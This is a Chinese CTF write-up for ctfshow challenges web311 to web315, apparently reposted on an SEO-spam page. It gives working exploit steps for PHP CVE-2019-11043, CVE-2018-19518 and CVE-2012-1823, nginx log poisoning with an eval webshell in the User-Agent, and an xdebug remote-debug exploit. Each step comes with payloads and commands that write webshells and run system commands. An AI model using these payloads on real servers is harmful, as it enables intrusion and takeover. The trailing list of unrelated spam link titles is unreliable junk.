当前位置: 首页 > news >正文

今科网站建设公司凡科建站官网

今科网站建设公司,凡科建站官网,网站广告销售怎们做,外贸公司属于什么企业1.web311 通过抓包发现php版本时为PHP/7.1.33dev 漏洞cve2019-11043 远程代码执行漏洞 利用条件: nginx配置了fastcgi_split_path_info 受影响系统: PHP 5.6-7.x,Nginx>0.7.31 下载工具进行利用 需要安装go环境 yum install golang -y …

1.web311

通过抓包发现php版本时为PHP/7.1.33dev
漏洞cve2019-11043 远程代码执行漏洞
利用条件: nginx配置了fastcgi_split_path_info
受影响系统: PHP 5.6-7.x,Nginx>=0.7.31

下载工具进行利用
需要安装go环境

yum install golang -y   
或者
apt install golang
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go env -w GOPROXY=https://goproxy.cn
go get -v && go build

利用:

go run . url/index.php 
查看flag在什么位置  
url/index.php?a=ls

在这里插入图片描述
在这里插入图片描述

2.web312

抓包版本
PHP/5.6.38
漏洞编号 CVE-2018-19518 远程命令执行漏洞

<?php
$a= base64_encode('<?php @eval($_POST[1]);?>');
echo base64_encode("echo $a | base64 -d >/var/www/html/1.php")
?>
抓包hostname传入 ,写入了一句哈木马,密码为1
x+-oProxyCommand%3decho%09ZWNobyBQRDl3YUhBZ1FHVjJZV3dvSkY5UVQxTlVXekZkS1RzL1BnPT0gfCBiYXNlNjQgLWQgPi92YXIvd3d3L2h0bWwvMS5waHA=|base64%09-d|sh}
post传入,查看flag位置
1=system('ls');
读取flag
1=system('cat ctfshowfl4g ');

在这里插入图片描述

3.web 313

php版本PHP/5.4.1
编号CVE-2012-1823 远程代码执行漏洞

burp抓包

index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
<?php system("ls");?>
<?php system("cat  /somewhere/fla9.txt");?>

在这里插入图片描述

4.web314

在这里插入图片描述
文件包含漏洞,过滤了冒号,一些伪协议用不了了,可以使用ua头日志包含

burp抓包ua写入一句话木马,包含日志文件

改为post方式
/?f=/var/log/nginx/access.log
ua头写入
<?php @eval($_POST[10])?>
post传入
10=system('ls /');
10=system('cat /fl6g');

在这里插入图片描述

5.web315

xdebug 9000 远程调试漏洞
利用脚本
需要有公网ip
会监听本地9000端口

python exp.py -t url/index.php  -c 'shell_exec("ls /");'

在这里插入图片描述
直接访问即可

参考文章:
web311-315

http://www.dinnco.com/news/68803.html

相关文章:

  • 网站的开发方法广州网站建设正规公司
  • 色块网站网络推广运营推广
  • 自己网站上做支付宝怎么收费的站长基地
  • 网站开发需要多钱微信营销神器
  • 做网站开发的电话销售话术简述网站推广的意义和方法
  • 网站推广平台怎么做百度账户登录
  • 专做网站seo网站关键词排名提升
  • 自己做报名网站线上渠道推广怎么做
  • 北京做兼职的网站百度竞价有点击无转化
  • 今日发生的重大国际新闻长沙建站seo公司
  • 手机兼职赚钱平台学生党seo营销服务
  • 网站是什么公司做的百度识图网页版
  • 网站样式模板站长之家排行榜
  • 低价网站设计多少钱推广方案应该有哪些方面
  • 自己做网站卖东西怎么做网络销售
  • 教你做吃的网站营销网页设计公司
  • 肇庆网站建设公司宁波seo排名公司
  • 济南微信网站建设磁力蜘蛛
  • dede网站打开慢中层管理者培训课程有哪些
  • 沈阳市城乡建设局网站互联网营销师培训内容
  • 如何做网站编辑 沒技术软文范例大全200字
  • 普洱北京网站建设百度下载安装最新版
  • 怎么在公司网站做超链接六种常见的网站类型
  • 湖南做旅游网站seo优化是什么意思
  • 广州微网站建设价位站长之家域名查询鹿少女
  • 宁河做网站公司百度怎么优化网站排名
  • 新网站建设seo排名专业公司
  • 电商网站里的水果图片怎么做的如何做外贸网站的推广
  • 哪个网站可有做投票搭建网络推广外包业务怎么样
  • 哪里有做阿里网站的商家联盟营销方案